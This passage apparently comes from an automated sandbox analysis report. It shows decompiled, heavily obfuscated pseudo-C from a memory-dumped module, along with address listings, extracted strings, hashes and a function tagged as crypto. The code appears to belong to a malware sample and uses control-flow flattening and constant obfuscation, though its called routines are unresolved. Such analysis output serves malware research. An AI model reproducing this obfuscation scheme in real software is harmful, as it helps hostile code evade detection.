				_v464 = 0x175ac8;
				_t1313 = 0xc;
				_v464 = _v464 / _t1313;
				_v464 = _v464 ^ 0x0000b75c;
				_v480 = 0xc1ac26;
				_t1314 = 0x34;
				_v480 = _v480 * 0x38;
				_v480 = _v480 ^ 0x7c46dca8;
				_v480 = _v480 << 8;
				_v480 = _v480 ^ 0x1b7fa586;
				_v244 = 0xd833ee;
				_v244 = _v244 | 0x560d1008;
				_v244 = _v244 ^ 0x56d72d14;
				_v252 = 0x16c4ca;
				_v252 = _v252 + 0xffff1e78;
				_v252 = _v252 ^ 0x001682bf;
				_v368 = 0x8513f7;
				_v368 = _v368 / _t1314;
				_v368 = _v368 << 9;
				_v368 = _v368 ^ 0x042a2baa;
				_v468 = 0xece356;
				_v468 = _v468 | 0x677b6939;
				_v468 = _v468 / _t1423;
				_v468 = _v468 ^ 0x01cb2f69;
				_v328 = 0x171af9;
				_v328 = _v328 >> 0xd;
				_v328 = _v328 + 0x2681;
				_v328 = _v328 ^ 0x00002738;
				_v344 = 0x7a9de;
				_t1315 = 0x4e;
				_v344 = _v344 / _t1315;
				_v344 = _v344 ^ 0x9c992b7c;
				_v344 = _v344 ^ 0x9c993dfa;
				_v508 = 0xa61b01;
				_v508 = _v508 << 3;
				_v508 = _v508 + 0x53df;
				_v508 = _v508 ^ 0xfec79fd7;
				_v508 = _v508 ^ 0xfbf6ab70;
				_v284 = 0xa434d2;
				_v284 = _v284 + 0xffff53d0;
				_v284 = _v284 ^ 0x00ae3302;
				_v240 = 0xdee9f9;
				_v240 = _v240 ^ 0x439905bb;
				_v240 = _v240 ^ 0x434a57e2;
				_v276 = 0xbf8bb7;
				_v276 = _v276 + 0xffff805f;
				_v276 = _v276 ^ 0x00b1f836;
				_v340 = 0xa33ec4;
				_v340 = _v340 >> 4;
				_v340 = _v340 + 0x7ece;
				_v340 = _v340 ^ 0x0004469a;
				_v212 = 0x2a6876;
				_t1316 = 0x51;
				_t1424 = _v464;
				_t1290 = _v464;
				_v212 = _v212 / _t1316;
				_v212 = _v212 ^ 0x0000f337;
				_v308 = 0xcc53b4;
				_v308 = _v308 + 0xffff6677;
				_v308 = _v308 ^ 0x00cb504b;
				goto L1;
				do {
					while(1) {
						L1:
						_t1459 = _t1427 - 0xa44cc36;
						if(_t1459 > 0) {
							goto L55;
						}
						L2:
						if(_t1459 == 0) {
							_t1215 = E10007931();
							__eflags = _t1215;
							if(_t1215 == 0) {
								L73:
								return _t1215;
							}
							_t1427 = 0xb567219;
							while(1) {
								L1:
								_t1459 = _t1427 - 0xa44cc36;
								if(_t1459 > 0) {
									goto L55;
								}
								goto L2;
							}
						}
						_t1460 = _t1427 - 0x42d7764;
						if(_t1460 > 0) {
							__eflags = _t1427 - 0x810ba92;
							if(__eflags > 0) {
								__eflags = _t1427 - 0x8117471;
								if(_t1427 == 0x8117471) {
									__eflags = _t1424 - _v640;
									if(_t1424 == _v640) {
										L52:
										_t1427 = _t1290;
										break;
									}
									_t1215 = E100087B2(E1000939E(), _v608, _v616, _t1424, _v272, _v624);
									_t1457 = _t1457 + 0x10;
									__eflags = _t1215 - _v600;
									if(_t1215 == _v600) {
										_t1215 = E10002800();
										goto L52;
									}
									_t1427 = 0xc17068a;
									while(1) {
										L1:
										_t1459 = _t1427 - 0xa44cc36;
										if(_t1459 > 0) {
											goto L55;
										}
										goto L2;
									}
									goto L55;
								}
								__eflags = _t1427 - 0x9024b61;
								if(_t1427 == 0x9024b61) {
									_t1215 = E10007E3E( &_v164, _v328,  &_v172, _v416, _v648, _v656, E1000939E());
									_t1457 = _t1457 + 0x14;
									asm("sbb esi, esi");
									_t1427 = ( ~_t1215 & 0x062b62b8) + 0x9024b61;
									continue;
								}
								__eflags = _t1427 - 0x9fd1abc;
								if(_t1427 == 0x9fd1abc) {
									_t1215 = E10002317();
									_t1427 = 0x3edf243;
									continue;
								}
								__eflags = _t1427 - 0xa32bd8d;
								if(_t1427 != 0xa32bd8d) {
									break;
								}
								_t1215 = E1000A0F3();
								__eflags = _t1215;
								if(_t1215 == 0) {
									_t1215 = E1000F217();
								}
								L45:
								_t1427 = 0xf0da7d2;
								continue;
							}
							if(__eflags == 0) {
								_t1215 = E1000C87E();
								asm("sbb esi, esi");
								_t1437 =  ~_t1215 & 0xff505aec;
								__eflags = _t1437;
								L38:
								_t1427 = _t1437 + 0xb134dd2;
								continue;
							}
							__eflags = _t1427 - 0x46a939b;
							if(_t1427 == 0x46a939b) {
								_t1215 = _v368;
								_t1427 = 0xb5ef472;
								_v76 = _t1215;
								continue;
							}
							__eflags = _t1427 - 0x49a5504;
							if(_t1427 == 0x49a5504) {
								_t1215 = E1001B1AD();
								__eflags = _t1215;
								if(_t1215 == 0) {
									goto L73;
								}
								_t1427 = 0xa44cc36;
								continue;
							}
							__eflags = _t1427 - 0x75fd1fa;
							if(_t1427 == 0x75fd1fa) {
								_t1215 = E100088FC(_v492, _v580, _v532, _v588, _v164);
								_t1457 = _t1457 + 0xc;
								L32:
								_t1427 = 0x8117471;
								continue;
							}
							__eflags = _t1427 - 0x806d595;
							if(_t1427 != 0x806d595) {
								break;
							}
							E1001B1AD();
							_t1290 = 0xaa4ec5d;
							_t1215 = E10017E33(_v508, _v344);
							_t1424 = _t1215;
							goto L32;
						}
						if(_t1460 == 0) {
							_t1427 = 0xb11f25f;
							continue;
						}
						_t1461 = _t1427 - 0xfaf959;
						if(_t1461 > 0) {
							__eflags = _t1427 - 0x29ca2af;
							if(_t1427 == 0x29ca2af) {
								_t1215 = E10003F9E();
								_v20 = _t1215;
								_t1427 = 0x2d679f;
								continue;
							}
							__eflags = _t1427 - 0x2e9dbe1;
							if(_t1427 == 0x2e9dbe1) {
								_t1215 = E1001D8AD();
								_t1427 = 0xccafd;
								continue;
							}
							__eflags = _t1427 - 0x3060090;
							if(_t1427 == 0x3060090) {
								_t1215 = E1001BE1F();
								goto L73;
							}
							__eflags = _t1427 - 0x3edf243;
							if(__eflags == 0) {
								_v180 = E100202B3(_v628, _v220, __eflags, _v556,  &_v176, 0x100011dc, _v316);
								_v188 = E100202B3(_v516, _v384, __eflags, _v456,  &_v184, 0x1000117c, _v352);
								_t1245 = E10017679( &_v188, _v548, _v620,  &_v180, _v320, _v448);
								asm("sbb esi, esi");
								_t1427 = ( ~_t1245 & 0x07a87873) + 0x5e5d22;
								E1000B952(_v484, _v188, _v612, _v440);
								_t1215 = E1000B952(_v232, _v180, _v304, _v376);
								_t1457 = _t1457 + 0x40;
							}
							break;
						}
						if(_t1461 == 0) {
							_push(_v408);
							_push( &_v92);
							_t1215 = E1001713E( &_v164);
							asm("sbb esi, esi");
							_t1427 = ( ~_t1215 & 0x01a27967) + 0x75fd1fa;
							continue;
						}
						if(_t1427 == 0xccafd) {
							_t1215 = E10022EA4();
							_t1427 = 0xc0ed2ac;
							continue;
						}
						if(_t1427 == 0x2d679f) {
							_t1215 = E1000CADE();
							_v36 = _t1215;
							_t1427 = 0xb4e2a7;
							continue;
						}
						if(_t1427 == 0x4f0ed7) {
							_t1215 = E100227CB();
							__eflags = _t1215;
							if(_t1215 == 0) {
								goto L73;
							} else {
								_t1427 = 0x49a5504;
								continue;
							}
						}
						if(_t1427 != 0xb4e2a7) {
							break;
						} else {
							_t1215 = E1001B0FE();
							_v88 = _t1215;
							_t1427 = 0x46a939b;
							continue;
						}
						L55:
						__eflags = _t1427 - 0xc9e6091;
						if(__eflags > 0) {
							__eflags = _t1427 - 0xecb4488;
							if(__eflags > 0) {
								__eflags = _t1427 - 0xf0da7d2;
								if(_t1427 == 0xf0da7d2) {
									E100088FC(_v260, _v268, _v496, _v504, _v172);
									_t1457 = _t1457 + 0xc;
									_t1427 = 0x75fd1fa;
									break;
								}
								__eflags = _t1427 - 0xf2dae19;
								if(_t1427 == 0xf2dae19) {
									_t1214 = E1000C551( &_v140, _v520, _v300,  &_v172);
									__eflags = _t1214;
									if(_t1214 != 0) {
										_t1215 = _v124;
										__eflags = _t1215 - 8;
										if(_t1215 != 8) {
											__eflags = _t1215;
											if(_t1215 == 0) {
												L108:
												_t1427 = 0xecb4488;
												continue;
											}
											__eflags = _t1215 - 1;
											if(_t1215 != 1) {
												goto L45;
											}
											goto L108;
										}
										_t1427 = 0x3060090;
										continue;
									}
									_t1215 = E10017E33(_v276, _v284);
									_pop(_t1334);
									_t1424 = _t1215;
									_t1290 = 0xe8ff26f;
									goto L45;
								}
								__eflags = _t1427 - 0xf4578df;
								if(_t1427 != 0xf4578df) {
									break;
								}
								_t1215 = E10019D8C();
								_t1427 = 0x4f0ed7;
								continue;
							}
							if(__eflags == 0) {
								_t1082 =  &_v248; // 0x434a57e2
								_t1334 = _v204;
								_t1215 = E10007549(_v204,  *_t1082,  &_v100, _v372, _v380);
								_t1457 = _t1457 + 0xc;
								__eflags = _t1215;
								if(_t1215 == 0) {
									_t1215 = _v124;
									__eflags = _t1215;
									if(_t1215 == 0) {
										_t1424 = E10017E33(_v340, _v240);
										_t1215 = _v124;
										_pop(_t1334);
									}
									__eflags = _t1215 - 1;
									if(_t1215 == 1) {
										_t1215 = E10017E33(_v308, _v212);
										_pop(_t1334);
										_t1424 = _t1215;
									}
								} else {
									_t1424 = _v364;
								}
								_t1290 = 0xe8ff26f;
								_t1427 = 0xa32bd8d;
								continue;
							}
							__eflags = _t1427 - 0xcbd5708;
							if(_t1427 == 0xcbd5708) {
								E1002196C();
								_t1215 = E1000A0F3();
								asm("sbb esi, esi");
								_t1427 = ( ~_t1215 & 0x012cb881) + 0xb71a810;
								continue;
							}
							__eflags = _t1427 - 0xd8401cc;
							if(_t1427 == 0xd8401cc) {
								_t1261 = E100179EC();
								__eflags = _t1261;
								if(_t1261 == 0) {
									_t1215 = E1000A0F3();
									asm("sbb esi, esi");
									_t1427 = ( ~_t1215 & 0x02dd10e4) + 0xccafd;
									continue;
								}
								_t1215 = E1000A0F3();
								asm("sbb esi, esi");
								_t1437 =  ~_t1215 & 0xfcfd6cc0;
								goto L38;
							}
							__eflags = _t1427 - 0xdff0265;
							if(_t1427 == 0xdff0265) {
								_t1215 = E1001E2E4();
								__eflags = _t1215;
								if(_t1215 == 0) {
									goto L73;
								}
								_t1427 = 0xcbd5708;
								continue;
							}
							__eflags = _t1427 - 0xe8ff26f;
							if(_t1427 != 0xe8ff26f) {
								break;
							}
							_t1215 = E1000929C(_v444, _v452,  &_v72);
							_pop(_t1334);
							_t1427 = 0xfaf959;
							continue;
						}
						if(__eflags == 0) {
							_t1215 = E100057E6();
							_t1427 = 0xb71a810;
							continue;
						}
						__eflags = _t1427 - 0xb567219;
						if(__eflags > 0) {
							__eflags = _t1427 - 0xb5ef472;
							if(_t1427 == 0xb5ef472) {
								_t1215 = _v468;
								_t1427 = 0xe8ff26f;
								_v12 = _t1215;
								continue;
							}
							__eflags = _t1427 - 0xb71a810;
							if(_t1427 == 0xb71a810) {
								_t1215 = E100122E4();
								_t1427 = 0xa63a8be;
								continue;
							}
							__eflags = _t1427 - 0xc0ed2ac;
							if(_t1427 == 0xc0ed2ac) {
								_t1215 = E10013682();
								_t1427 = 0xdff0265;
								continue;
							}
							__eflags = _t1427 - 0xc17068a;
							if(_t1427 != 0xc17068a) {
								break;
							}
							_t1215 = E1000D1CF(_t1334);
							goto L73;
						}
						if(__eflags == 0) {
							_t1215 = E1001C47E();
							asm("sbb esi, esi");
							_t1427 = ( ~_t1215 & 0xfe8ad0e0) + 0xd8401cc;
							continue;
						}
						__eflags = _t1427 - 0xa63a8be;
						if(_t1427 == 0xa63a8be) {
							_t1215 = E1001B6DB(_v228, _v236, _v488);
							goto L73;
						}
						__eflags = _t1427 - 0xaa4ec5d;
						if(_t1427 == 0xaa4ec5d) {
							_v84 = E10008B6B();
							_t1215 = E1000B756(_v552, _v560, _v192, _t1275);
							_pop(_t1334);
							_v80 = _t1215;
							_t1427 = 0x29ca2af;
							continue;
						}
						__eflags = _t1427 - 0xb11f25f;
						if(_t1427 == 0xb11f25f) {
							_t1215 = E10008E5D();
							__eflags = _t1215;
							if(_t1215 == 0) {
								goto L73;
							}
							_t1427 = 0xf4578df;
							continue;
						}
						__eflags = _t1427 - 0xb134dd2;
						if(_t1427 != 0xb134dd2) {
							break;
						}
						_t1215 = E100231BA();
						_t1427 = 0x9fd1abc;
					}
					__eflags = _t1427 - 0x5e5d22;
				} while (_t1427 != 0x5e5d22);
				goto L73;
			}

0x10018001
0x10018007
0x10018021
0x10018022
0x10018029
0x1001802c
0x1001802d
0x1001802e
0x10018036
0x10018040
0x10018044
0x1001804c
0x10018054
0x1001805f
0x1001806a
0x10018072
0x1001807d
0x10018085
0x1001808d
0x10018097
0x1001809b
0x100180a3
0x100180ab
0x100180bb
0x100180bf
0x100180c7
0x100180cf
0x100180d7
0x100180e4
0x100180e7
0x100180eb
0x100180f3
0x100180fb
0x10018106
0x10018111
0x10018119
0x10018124
0x1001812c
0x10018134
0x10018139
0x10018141
0x10018149
0x10018151
0x10018159
0x10018166
0x1001816a
0x10018172
0x1001817d
0x10018188
0x10018193
0x1001819e
0x100181a9
0x100181b4
0x100181bf
0x100181d5
0x100181dc
0x100181e7
0x100181ef
0x100181f8
0x100181fb
0x10018208
0x1001820b
0x1001820f
0x10018217
0x10018222
0x1001822a
0x10018232
0x1001823d
0x10018253
0x1001825a
0x10018265
0x10018270
0x10018277
0x10018282
0x1001828d
0x10018298
0x100182a3
0x100182ab
0x100182b6
0x100182c1
0x100182cc
0x100182d4
0x100182df
0x100182f1
0x100182f6
0x100182ff
0x1001830a
0x10018312
0x1001831c
0x1001831f
0x10018323
0x1001832b
0x10018333
0x1001833e
0x10018349
0x10018354
0x1001835c
0x10018364
0x1001836c
0x10018374
0x1001837f
0x10018387
0x10018392
0x1001839d
0x100183a8
0x100183b3
0x100183bb
0x100183c6
0x100183d1
0x100183e4
0x100183eb
0x100183f6
0x10018401
0x10018409
0x10018414
0x1001841f
0x10018435
0x1001843c
0x10018444
0x1001844c
0x10018457
0x10018469
0x1001846c
0x10018475
0x10018480
0x1001848b
0x10018496
0x1001849e
0x100184a6
0x100184b1
0x100184bc
0x100184c7
0x100184d2
0x100184dd
0x100184e8
0x100184f3
0x10018504
0x10018509
0x10018512
0x1001851d
0x10018528
0x1001852f
0x10018534
0x1001853d
0x10018548
0x10018553
0x1001855e
0x10018569
0x1001857c
0x1001857f
0x10018586
0x10018591
0x1001859c
0x100185a7
0x100185b2
0x100185bd
0x100185c8
0x100185d3
0x100185db
0x100185e6
0x100185f1
0x100185fc
0x10018607
0x10018615
0x10018616
0x1001861c
0x1001862c
0x10018630
0x10018638
0x10018643
0x1001864b
0x10018656
0x1001865e
0x10018663
0x1001866d
0x1001866e
0x10018672
0x1001867a
0x10018685
0x1001868d
0x10018695
0x100186a0
0x100186ab
0x100186c3
0x100186cc
0x100186d7
0x100186e2
0x100186ed
0x100186f5
0x100186f8
0x100186f9
0x10018700
0x10018708
0x10018713
0x1001871e
0x10018729
0x10018734
0x1001873f
0x1001874a
0x1001875d
0x10018764
0x1001876f
0x10018782
0x10018789
0x10018794
0x1001879f
0x100187aa
0x100187b2
0x100187ba
0x100187c2
0x100187ca
0x100187d2
0x100187e5
0x100187ec
0x100187f7
0x10018802
0x1001880d
0x10018815
0x10018820
0x1001882b
0x10018836
0x1001884c
0x1001885c
0x10018863
0x1001886e
0x10018876
0x1001887e
0x10018886
0x1001888e
0x10018896
0x100188a1
0x100188ac
0x100188b4
0x100188bf
0x100188ca
0x100188d5
0x100188e0
0x100188f3
0x100188fa
0x10018905
0x10018910
0x10018918
0x10018923
0x1001892e
0x10018941
0x10018948
0x10018953
0x1001895e
0x10018969
0x10018974
0x1001897b
0x10018988
0x1001899c
0x100189a1
0x100189a8
0x100189b0
0x100189bb
0x100189ca
0x100189cd
0x100189d1
0x100189d6
0x100189de
0x100189e6
0x100189f1
0x100189fc
0x10018a03
0x10018a0e
0x10018a19
0x10018a24
0x10018a37
0x10018a3e
0x10018a49
0x10018a54
0x10018a64
0x10018a68
0x10018a6d
0x10018a75
0x10018a7d
0x10018a8f
0x10018a92
0x10018a99
0x10018aa4
0x10018aaf
0x10018aba
0x10018ac5
0x10018ad0
0x10018adb
0x10018ae6
0x10018af1
0x10018afc
0x10018b04
0x10018b09
0x10018b0e
0x10018b16
0x10018b1e
0x10018b29
0x10018b34
0x10018b3c
0x10018b47
0x10018b52
0x10018b5a
0x10018b65
0x10018b70
0x10018b7b
0x10018b86
0x10018b91
0x10018b9c
0x10018ba7
0x10018bba
0x10018bc1
0x10018bcc
0x10018bd7
0x10018bdf
0x10018be6
0x10018bf1
0x10018c08
0x10018c0b
0x10018c12
0x10018c1d
0x10018c28
0x10018c38
0x10018c3c
0x10018c41
0x10018c49
0x10018c51
0x10018c59
0x10018c61
0x10018c6e
0x10018c6f
0x10018c73
0x10018c7b
0x10018c8e
0x10018c95
0x10018ca0
0x10018cab
0x10018cb6
0x10018cc9
0x10018cd0
0x10018cdb
0x10018ce6
0x10018cf1
0x10018cfc
0x10018d07
0x10018d12
0x10018d1d
0x10018d28
0x10018d33
0x10018d3e
0x10018d49
0x10018d54
0x10018d68
0x10018d6f
0x10018d7a
0x10018d85
0x10018d90
0x10018d98
0x10018da3
0x10018db6
0x10018dc5
0x10018dcc
0x10018dd7
0x10018de2
0x10018ded
0x10018df8
0x10018e03
0x10018e0e
0x10018e15
0x10018e20
0x10018e2b
0x10018e36
0x10018e41
0x10018e4c
0x10018e54
0x10018e5f
0x10018e72
0x10018e79
0x10018e84
0x10018e8f
0x10018e97
0x10018e9f
0x10018eaf
0x10018eb4
0x10018eb8
0x10018ec0
0x10018ed4
0x10018ed9
0x10018eea
0x10018eed
0x10018eee
0x10018ef5
0x10018efd
0x10018f08
0x10018f13
0x10018f1e
0x10018f29
0x10018f34
0x10018f3c
0x10018f47
0x10018f52
0x10018f5a
0x10018f70
0x10018f77
0x10018f82
0x10018f8d
0x10018f98
0x10018fa3
0x10018fae
0x10018fb9
0x10018fc4
0x10018fcf
0x10018fda
0x10018fe5
0x10018fed
0x10018ff5
0x10019002
0x10019006
0x1001900e
0x10019021
0x10019030
0x10019037
0x10019042
0x1001904d
0x10019055
0x1001905a
0x1001905f
0x10019064
0x1001906c
0x10019074
0x1001907c
0x10019086
0x1001908a
0x10019092
0x1001909a
0x100190a5
0x100190ae
0x100190b2
0x100190ba
0x100190c2
0x100190d0
0x100190d3
0x100190d7
0x100190df
0x100190e7
0x100190f2
0x100190fa
0x10019105
0x1001910d
0x10019115
0x1001911d
0x10019122
0x1001912a
0x10019135
0x10019148
0x1001914f
0x1001915a
0x10019162
0x1001916f
0x10019173
0x10019178
0x10019180
0x10019192
0x10019197
0x1001919e
0x100191a9
0x100191be
0x100191c1
0x100191c8
0x100191d3
0x100191db
0x100191e6
0x100191f1
0x100191fc
0x10019207
0x10019212
0x1001921d
0x10019228
0x1001923e
0x10019245
0x1001924d
0x10019258
0x10019263
0x10019279
0x10019280
0x1001928b
0x10019296
0x1001929e
0x100192a9
0x100192b4
0x100192c6
0x100192c9
0x100192d0
0x100192db
0x100192e6
0x100192f1
0x100192f9
0x10019304
0x1001930f
0x1001931c
0x1001932c
0x10019337
0x10019342
0x1001934d
0x10019358
0x10019363
0x1001936e
0x10019379
0x10019384
0x1001938f
0x10019397
0x100193a2
0x100193ad
0x100193c1
0x100193c4
0x100193cb
0x100193d2
0x100193d9
0x100193e4
0x100193ef
0x100193fa
0x100193fa
0x10019405
0x10019405
0x10019405
0x10019405
0x1001940b
0x00000000
0x00000000
0x10019411
0x10019411
0x10019874
0x10019879
0x1001987b
0x100199a4
0x100199ab
0x100199ab
0x10019881
0x10019405
0x10019405
0x10019405
0x1001940b
0x00000000
0x00000000
0x00000000
0x1001940b
0x10019405
0x10019417
0x1001941d
0x1001965e
0x10019664
0x10019763
0x10019769
0x10019815
0x10019819
0x10019862
0x10019862
0x00000000
0x10019862
0x1001983a
0x1001983f
0x10019842
0x10019846
0x1001985d
0x00000000
0x1001985d
0x10019848
0x10019405
0x10019405
0x10019405
0x1001940b
0x00000000
0x00000000
0x00000000
0x1001940b
0x00000000
0x10019405
0x1001976f
0x10019775
0x100197f6
0x100197fb
0x10019802
0x1001980a
0x00000000
0x1001980a
0x10019777
0x1001977d
0x100197b5
0x100197ba
0x00000000
0x100197ba
0x1001977f
0x10019785
0x00000000
0x00000000
0x1001978f
0x10019794
0x10019796
0x1001979f
0x1001979f
0x100197a4
0x100197a4
0x00000000
0x100197a4
0x1001966a
0x10019747
0x10019750
0x10019752
0x10019752
0x10019758
0x10019758
0x00000000
0x10019758
0x10019670
0x10019676
0x10019728
0x1001972f
0x10019734
0x00000000
0x10019734
0x1001967c
0x10019682
0x10019711
0x10019716
0x10019718
0x00000000
0x00000000
0x1001971e
0x00000000
0x1001971e
0x10019684
0x1001968a
0x100196f9
0x100196fe
0x100196d2
0x100196d2
0x00000000
0x100196d2
0x1001968c
0x10019692
0x00000000
0x00000000
0x100196a6
0x100196af
0x100196c9
0x100196d0
0x00000000
0x100196d0
0x10019423
0x10019654
0x00000000
0x10019654
0x10019429
0x1001942f
0x10019507
0x1001950d
0x1001963e
0x10019643
0x1001964a
0x00000000
0x1001964a
0x10019513
0x10019519
0x10019628
0x1001962d
0x00000000
0x1001962d
0x1001951f
0x10019525
0x10019ccb
0x00000000
0x10019ccb
0x1001952b
0x10019531
0x10019569
0x1001959e
0x100195c6
0x100195e8
0x100195f0
0x100195f6
0x10019617
0x1001961c
0x1001961c
0x00000000
0x10019531
0x10019435
0x100194cc
0x100194e1
0x100194e9
0x100194f3
0x100194fc
0x00000000
0x100194fc
0x10019441
0x100194bd
0x100194c2
0x00000000
0x100194c2
0x10019449
0x1001949c
0x100194a1
0x100194a8
0x00000000
0x100194a8
0x10019451
0x1001947e
0x10019483
0x10019485
0x00000000
0x1001948b
0x1001948b
0x00000000
0x1001948b
0x10019485
0x10019459
0x00000000
0x1001945f
0x10019463
0x10019468
0x1001946f
0x00000000
0x1001946f
0x1001988b
0x1001988b
0x10019891
0x10019a11
0x10019a17
0x10019bc5
0x10019bcb
0x10019c9f
0x10019ca4
0x10019ca7
0x00000000
0x10019ca7
0x10019bd1
0x10019bd7
0x10019c18
0x10019c1f
0x10019c21
0x10019c4f
0x10019c56
0x10019c59
0x10019c65
0x10019c67
0x10019c72
0x10019c72
0x00000000
0x10019c72
0x10019c69
0x10019c6c
0x00000000
0x00000000
0x00000000
0x10019c6c
0x10019c5b
0x00000000
0x10019c5b
0x10019c3f
0x10019c45
0x10019c46
0x10019c48
0x00000000
0x10019c48
0x10019bd9
0x10019bdf
0x00000000
0x00000000
0x10019bec
0x10019bf1
0x00000000
0x10019bf1
0x10019a1d
0x10019b34
0x10019b3b
0x10019b43
0x10019b48
0x10019b4b
0x10019b4d
0x10019b58
0x10019b5f
0x10019b61
0x10019b85
0x10019b87
0x10019b8e
0x10019b8e
0x10019b8f
0x10019b92
0x10019bb0
0x10019bb6
0x10019bb7
0x10019bb7
0x10019b4f
0x10019b4f
0x10019b4f
0x10019bb9
0x10019bbb
0x00000000
0x10019bbb
0x10019a23
0x10019a29
0x10019af7
0x10019b03
0x10019b0c
0x10019b14
0x00000000
0x10019b14
0x10019a2f
0x10019a35
0x10019aa0
0x10019aa5
0x10019aa7
0x10019acd
0x10019ad6
0x10019ade
0x00000000
0x10019ade
0x10019ab0
0x10019ab9
0x10019abb
0x00000000
0x10019abb
0x10019a37
0x10019a3d
0x10019a7b
0x10019a80
0x10019a82
0x00000000
0x00000000
0x10019a88
0x00000000
0x10019a88
0x10019a3f
0x10019a41
0x00000000
0x00000000
0x10019a5d
0x10019a62
0x10019a63
0x00000000
0x10019a63
0x10019897
0x10019a02
0x10019a07
0x00000000
0x10019a07
0x1001989d
0x100198a3
0x1001996d
0x10019973
0x100199df
0x100199e6
0x100199e8
0x00000000
0x100199e8
0x10019975
0x1001997b
0x100199d0
0x100199d5
0x00000000
0x100199d5
0x1001997d
0x10019983
0x100199ba
0x100199bf
0x00000000
0x100199bf
0x10019985
0x1001998b
0x00000000
0x00000000
0x1001999f
0x00000000
0x1001999f
0x100198a9
0x10019951
0x1001995a
0x10019962
0x00000000
0x10019962
0x100198af
0x100198b5
0x10019cea
0x00000000
0x10019cf0
0x100198bb
0x100198c1
0x1001992b
0x10019932
0x10019938
0x10019939
0x10019940
0x00000000
0x10019940
0x100198c3
0x100198c9
0x100198f5
0x100198fa
0x100198fc
0x00000000
0x00000000
0x10019902
0x00000000
0x10019902
0x100198cb
0x100198d1
0x00000000
0x00000000
0x100198de
0x100198e3
0x100198e3
0x10019cac
0x10019cac
0x00000000

Strings

vh*, xrefs: 100193AD
"]^, xrefs: 10019CAC
<r+=, xrefs: 10018E6A
<r+=, xrefs: 10018E84
|Y, xrefs: 10019037
t%, xrefs: 10018B5A
e+, xrefs: 10018528
9i{g, xrefs: 10019263
js, xrefs: 10018B29
Nv0, xrefs: 1001802E
Z~, xrefs: 10018815
IW], xrefs: 1001861C
gX, xrefs: 1001848B
3LH, xrefs: 10018CDB
aq, xrefs: 1001882B
#ZvD, xrefs: 10018349
?7C, xrefs: 100183F6
WJC, xrefs: 10019B34
`z`, xrefs: 10018BD7
x., xrefs: 100189F1
8', xrefs: 100192A9
AVr, xrefs: 100184DD
(, xrefs: 10019115
Gd, xrefs: 100186ED
4j~, xrefs: 10018054
ec, xrefs: 10018FED
>m$6, xrefs: 1001994A

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: IW]$"]^$#ZvD$($3LH$4j~$8'$9i{g$<r+=$<r+=$>m$6$?7C$AVr$Gd$Nv0$Z~$`z`$ec$e+$js$t%$vh*$x.$|Y$WJC$aq$gX
API String ID: 0-4141946050
Opcode ID: 09fb02f069e3cfb3c65114fa6236b38709bd25c8aa1ef3d2d9f6c0eeba9d72a8
Instruction ID: 8b4e778c0909fa6e1310e67f3ada32c8d01eec233e0be003b70cae95c3950c7f
Opcode Fuzzy Hash: 09fb02f069e3cfb3c65114fa6236b38709bd25c8aa1ef3d2d9f6c0eeba9d72a8
Instruction Fuzzy Hash: 6BD2F0719083808BD378CF25C58ABCFBBE1FB85354F11891DE5DD9A260DBB19989CB42

Uniqueness

Uniqueness Score: -1.00%

Function 1000E16F, Relevance: 28.2, Strings: 22, Instructions: 696
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E1000E16F(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				intOrPtr* _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				void* _t780;
				char _t789;
				void* _t791;
				void* _t797;
				void* _t815;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				signed int _t829;
				signed int _t830;
				signed int _t831;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				signed int _t839;
				signed int _t840;
				signed int _t841;
				void* _t849;
				void* _t855;
				void* _t917;
				intOrPtr* _t938;
				void* _t940;
				void* _t944;
				void* _t945;
				void* _t952;

				_t938 = __ecx;
				_v80 = __ecx;
				_v344 = 0x7ea9e1;
				_v344 = _v344 | 0xdf61e98e;
				_v344 = _v344 + 0xecf3;
				_v344 = _v344 | 0xb2215b49;
				_v344 = _v344 ^ 0xffa1dfeb;
				_v236 = 0x67fb9d;
				_v236 = _v236 >> 0xd;
				_v236 = _v236 << 2;
				_v236 = _v236 ^ 0x00000cfc;
				_v276 = 0x58235;
				_v276 = _v276 | 0xf3ce5eb8;
				_v276 = _v276 << 3;
				_v276 = _v276 ^ 0x9e7ef5e8;
				_v288 = 0xe3af54;
				_v288 = _v288 * 0x38;
				_v288 = _v288 | 0xd7ffa662;
				_t944 = 0;
				_v288 = _v288 ^ 0xf7fffe62;
				_t815 = 0x50630cd;
				_v388 = 0x904545;
				_v388 = _v388 >> 3;
				_t822 = 0x5a;
				_v388 = _v388 / _t822;
				_v388 = _v388 << 0xb;
				_v388 = _v388 ^ 0x019a5800;
				_v380 = 0x404f8e;
				_v380 = _v380 << 0xf;
				_t823 = 0x4d;
				_v380 = _v380 / _t823;
				_v380 = _v380 + 0x3c5a;
				_v380 = _v380 ^ 0x00847b85;
